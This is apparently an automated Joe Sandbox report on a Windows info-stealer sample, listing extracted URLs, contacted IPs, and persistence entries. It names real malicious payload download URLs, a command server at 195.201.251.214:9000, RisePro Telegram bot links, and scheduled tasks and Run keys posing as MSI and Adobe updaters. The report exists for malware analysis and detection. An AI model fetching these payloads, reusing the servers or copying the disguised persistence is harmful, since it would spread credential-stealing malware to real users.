https://195.201.251.214:9000/mozglue.dllge	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://db-ip.com/x;	RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.105.132.27/meta2806.exeL	RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/softokn3.dllgM	RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/risepro_bot3320	RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/risepro_botisepro_bot	RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/risepro_botv:#	RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://potterryisiw.shop/	RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://api.ip.sb/ip	MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/vcruntime140.dll.	RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp, 6p7a7injLZJojhETBNhL.exe, 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmp, MSIUpdaterV168.exe, 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmp, MSIUpdaterV168.exe, 0000000E.00000002.1980283521.0000000000150000.00000004.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.105.132.27/lumma2806.exeB	RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/RiseProSUPPORT	RegAsm.exe, 00000014.00000002.1940927301.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, Wb7RPsmWU0j98XyD1Ncm8BU.zip.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://potterryisiw.shop/apiB	RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2948137481.0000000019B2D000.00000004.00000020.00020000.00000000.sdmp, SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/vcruntime140.dllrv:129.0)	RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/softokn3.dllo	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	D87fZN3R3jFeplaces.sqlite.3.dr	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/vcruntime140.dller	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/softokn3.dlle	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://potterryisiw.shop/apip	RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers/frere-user.html	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/x$H	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.maxmind.com/en/locate-my-ip-address	RegAsm.exe	false	Avira URL Cloud: safe	unknown
https://db-ip.com/v	RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214/	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/Jb	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	false	Avira URL Cloud: safe	unknown
http://ns.exif/1e.$A/	RegAsm.exe, 00000003.00000002.1990168095.00000000015B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.105.132.27/meta2806.exe/risep	RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://195.201.251.214:9000170le	RegAsm.exe, 00000018.00000002.2939946030.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io:443/widget/demo/8.46.123.33	RegAsm.exe, 00000003.00000002.1989820350.0000000001361000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	D87fZN3R3jFeplaces.sqlite.3.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/softokn3.dlls5	RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/mozglue.dll	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/y	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://potterryisiw.shop/l	RegAsm.exe, 00000026.00000002.2004278407.0000000001398000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://195.201.251.214:9000/	RegAsm.exe, 00000018.00000002.2942958827.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.105.132.27/rise2806.exes	RegAsm.exe, 00000003.00000002.1990536151.0000000005720000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/widget/demo/8.46.123.332	RegAsm.exe, 00000014.00000002.1940927301.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.s	MSIUpdaterV168.exe, 0000002E.00000002.2014079426.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002841000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2948137481.0000000019B2D000.00000004.00000020.00020000.00000000.sdmp, SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/icrosoft	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/8(H	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://potterryisiw.shop/api1	RegAsm.exe, 00000026.00000002.2003589511.0000000001335000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/Qb	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/freebl3.dllc	RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com:443/demo/home.php?s=8.46.123.33	RegAsm.exe, 00000003.00000002.1989820350.000000000137B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/g067nDJ	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/nss3.dlls0	RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/T	RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/t_	RegAsm.exe, 00000014.00000002.1940927301.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.251.214:9000/freebl3.dll	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/=3%	RegAsm.exe, 00000018.00000002.2942958827.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/softokn3.dll	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
77.105.132.27	unknown	Russian Federation	42031	PLUSTELECOM-ASRU	true
188.114.97.3	potterryisiw.shop	European Union	13335	CLOUDFLARENETUS	true
195.201.251.214	unknown	Germany	24940	HETZNER-ASDE	false
104.26.4.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465070
Start date and time:	2024-07-01 09:15:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zyJWi2vy29.exe renamed because original name is a hash value
Original Sample Name:	97768ab0a4837757b74de2ae892badab.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@80/66@4/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 89% Number of executed functions: 122 Number of non-executed functions: 262
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29, 20.189.173.22, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:16:11	API Interceptor	4x Sleep call for process: WerFault.exe modified
03:16:21	API Interceptor	139x Sleep call for process: RegAsm.exe modified
08:16:15	Task Scheduler	Run new task: MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR path: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
08:16:15	Task Scheduler	Run new task: MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG path: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
08:16:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe
08:16:18	Task Scheduler	Run new task: MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR path: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
08:16:18	Task Scheduler	Run new task: MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR path: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
08:16:18	Task Scheduler	Run new task: MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG path: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
08:16:20	Task Scheduler	Run new task: MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG path: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
08:16:20	Task Scheduler	Run new task: MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR path: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
08:16:23	Task Scheduler	Run new task: MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG path: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
08:16:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe
08:16:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe
08:16:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915 C:\Users\user\AppData\Local\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\AdobeUpdaterV168.exe
08:17:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe
08:17:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe
08:17:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	Find-DscResource_QoS.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/212.102.41.13/country
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
77.105.132.27	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.105.132.27/meta2806.exe
188.114.97.3	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	000366cm.nyashka.top/phpflowergenerator.php
	DHL Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.evoolihubs.shop/fwdd/?CbPtaF=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&NV=CzkTp6UpmNmd
	BbaXbvOA7D.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	228282cm.nyashka.top/ExternalimagevmRequestlongpollsqldbLocal.php
	j05KsN2280.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	640740cm.nyashka.top/providerEternalGameWindowstest.php
	QUOTATION_JUNQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/L69kvhYI/download
	Techno_PO LV12406-00311.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/cpGHnqq
	QUOTATION_JUNQTRA031244#U0652PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/Txmfx0A2/download
	RITS Ref 3379-06.exe	Get hash	malicious	FormBook	Browse	www.ad14.fun/az6h/
	QUOTATION_JUNQTRA031244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/khvbX8Pe/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	56bDgH9sMQ.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vjYcExA6ou.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	2E7ZdlxkOL.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	149.154.167.99
	S8co1ACRdn.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	M9dfZzH3qn.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	5IRIk4f1PO.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	149.154.167.99
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	149.154.167.99
	project.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	WR0fuHnEVW.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
potterryisiw.shop	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	188.114.96.3
ipinfo.io	D5u70TJkrE.exe	Get hash	malicious	DCRat	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	factura546532.msi_factura546532.msi_78870.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.10794.31741.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Packed2.47113.12395.16994.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
